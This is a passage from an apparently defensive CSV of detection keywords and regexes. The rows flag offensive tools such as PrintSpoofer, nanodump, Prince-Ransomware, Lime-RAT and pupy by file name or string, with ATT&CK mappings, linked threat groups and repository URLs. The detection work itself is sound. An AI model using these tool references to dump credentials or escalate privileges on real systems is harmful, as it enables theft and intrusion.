TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","55375" "*Prince-Ransomware/releases/download*",".{0,1000}Prince\-Ransomware\/releases\/download.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","55376" "*print_shtinkering_crash_location*",".{0,1000}print_shtinkering_crash_location.{0,1000}","offensive_tool_keyword","nanodump","The 
swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55377" "*printerbug.py *:*@* *",".{0,1000}printerbug\.py\s.{0,1000}\:.{0,1000}\@.{0,1000}\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55378" "*PrinterNotifyPotato *",".{0,1000}PrinterNotifyPotato\s.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","55379" "*PrinterNotifyPotato.*",".{0,1000}PrinterNotifyPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","55380" "*Println(""DO WESTERN!!""*",".{0,1000}Println\(\""DO\sWESTERN!!\"".{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#content","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","55381" 
"*PrintNightmare.*",".{0,1000}PrintNightmare\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","55382" "*PrintNightmare.dll*",".{0,1000}PrintNightmare\.dll.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","55383" "*printnightmare_check*",".{0,1000}printnightmare_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55384" "*PrintNotifyPotato.exe*",".{0,1000}PrintNotifyPotato\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55385" "*PrintNotifyPotato-NET2.exe*",".{0,1000}PrintNotifyPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55386" "*printspoofer -Command*",".{0,1000}printspoofer\s\-Command.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55387" "*PrintSpoofer v%ws (by @itm4n)*",".{0,1000}PrintSpoofer\sv\%ws\s\(by\s\@itm4n\).{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55388" "*PrintSpoofer v%ws (by @itm4n)*",".{0,1000}PrintSpoofer\sv\%ws\s\(by\s\@itm4n\).{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55389" "*PrintSpoofer-*",".{0,1000}PrintSpoofer\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","55390" "*PrintSpoofer.*",".{0,1000}PrintSpoofer\..{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","55391" "*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55392" "*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55393" "*PrintSpoofer.exe*",".{0,1000}PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55394" "*printspoofer.exe*",".{0,1000}printspoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55395" 
"*printspoofer.py*",".{0,1000}printspoofer\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55396" "*PrintSpoofer.sln*",".{0,1000}PrintSpoofer\.sln.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55397" "*PrintSpoofer_x64.exe*",".{0,1000}PrintSpoofer_x64\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55398" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55399" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55400" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55401" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55402" "*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55403" "*PrintSpooferNet.exe*",".{0,1000}PrintSpooferNet\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55404" "*Priv Esc Check Bof*",".{0,1000}Priv\sEsc\sCheck\sBof.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - 
T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55405" "*priv/priv_windows.go*",".{0,1000}priv\/priv_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55406" "*Private AttackRunning As Boolean = *",".{0,1000}Private\sAttackRunning\sAs\sBoolean\s\=\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","55407" "*Private HostToAttack As String*",".{0,1000}Private\sHostToAttack\sAs\sString.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - 
T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","55408" "*privcheck.cna*",".{0,1000}privcheck\.cna.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55409" "*privcheck32*",".{0,1000}privcheck32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55410" "*PrivEditor - Kernel Mode WinDbg extension for token privilege edit*",".{0,1000}PrivEditor\s\-\sKernel\sMode\sWinDbg\sextension\sfor\stoken\sprivilege\sedit.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55411" "*PrivEditor.dll*",".{0,1000}PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - 
T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55412" "*Privesc.psm1*",".{0,1000}Privesc\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55413" "*Privesc.tests.ps1*",".{0,1000}Privesc\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55414" "*privesc_checker*",".{0,1000}privesc_checker.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55415" "*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - 
T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55416" "*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55417" "*privesc_juicy_potato '*",".{0,1000}privesc_juicy_potato\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55418" 
"*privesc_juicy_potato.py*",".{0,1000}privesc_juicy_potato\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55419" "*privesc_powerup '*",".{0,1000}privesc_powerup\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55420" "*privesc_powerup.py*",".{0,1000}privesc_powerup\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55421" "*privesc-check*",".{0,1000}privesc\-check.{0,1000}","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. 
